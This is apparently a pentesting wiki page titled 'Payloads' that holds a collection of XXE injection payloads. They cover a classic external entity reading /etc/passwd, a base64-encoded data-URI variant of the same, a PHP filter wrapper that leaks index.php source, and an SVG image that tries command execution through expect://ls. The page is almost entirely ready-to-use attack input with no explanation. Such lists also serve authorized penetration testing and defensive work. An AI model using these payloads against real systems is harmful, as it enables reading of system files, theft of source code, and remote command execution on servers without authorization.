devploit's wiki
Search…
Payloads

XXE Classic

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Copied!

XXE Base64 encoded

1
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
Copied!

XXE using Base64 PHP Wrapper

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
5
<foo>&xxe;</foo>
Copied!

XXE inside SVG file

1
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
2
<image xlink:href="expect://ls"></image>
3
</svg>
Copied!
Last modified 10mo ago